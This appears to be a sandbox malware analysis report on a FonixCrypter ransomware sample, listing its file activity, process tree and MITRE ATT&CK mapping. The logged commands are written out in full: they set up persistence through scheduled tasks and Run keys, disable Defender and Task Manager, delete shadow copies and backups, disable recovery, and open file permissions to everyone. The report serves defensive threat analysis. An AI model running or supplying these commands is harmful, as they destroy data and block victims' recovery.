File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImagesMask.bmp	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePage.html	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\7-Zip\Lang\vi.txt	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_content-background.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_ON.GIF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR6B.GIF	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-text.xml	de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe

C:\Users\Admin\AppData\Local\Temp\de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe
"C:\Users\Admin\AppData\Local\Temp\de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Drops startup file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
PID:1100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %temp%/FonixCrypter.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1296

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\Users\Admin\AppData\Local\Temp/FonixCrypter.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
3⤵
- Adds Run entry to start application
PID:1308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1392

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
3⤵
- Adds Run entry to start application
PID:1400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1456

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
3⤵
- Adds Run entry to start application
PID:1480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%FonixCrypter.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonixCrypter.exe /f
3⤵
- Adds Run entry to start application
PID:304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:308

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:272

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
- Suspicious use of WriteProcessMemory
PID:992

C:\Windows\SysWOW64\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1556

C:\Windows\SysWOW64\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cmd.exe /c vssadmin Delete Shadows /All /Quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet/ & icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
PID:812

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:540

C:\Windows\SysWOW64\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:548

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\SysWOW64\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
- Modifies file permissions
PID:1456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy Cpriv.key %appdata%\Cpriv.key
2⤵
PID:304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy Cpub.key %appdata%\Cpub.key
2⤵
PID:984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy SystemID %appdata%\SystemID
2⤵
PID:272

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:2028

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:528

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Registry Run Keys / Startup Folder

1

T1060

Modify Existing Service

1

T1031

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

File Permissions Modification

1

T1222

Modify Registry

2

T1112

File Deletion

2

T1107

Credential Access

Credentials in Files

1

T1081

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cpriv.key

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cpub.key

Download Submit
C:\Users\Admin\AppData\Local\Temp\SystemID

Download Submit
C:\Users\Admin\AppData\Roaming\Cpriv.key

Download Submit
C:\Users\Admin\AppData\Roaming\Cpriv.key

Download Submit
C:\Users\Admin\AppData\Roaming\Cpub.key

Download Submit
C:\Users\Admin\AppData\Roaming\Cpub.key

Download Submit
C:\Users\Admin\AppData\Roaming\SystemID

Download Submit
memory/1100-0-0x0000000002980000-0x0000000002991000-memory.dmp

Filesize
68KB

Download
memory/1100-1-0x0000000002D90000-0x0000000002DA1000-memory.dmp

Filesize
68KB

Download
memory/1100-2-0x0000000002980000-0x0000000002991000-memory.dmp

Filesize
68KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads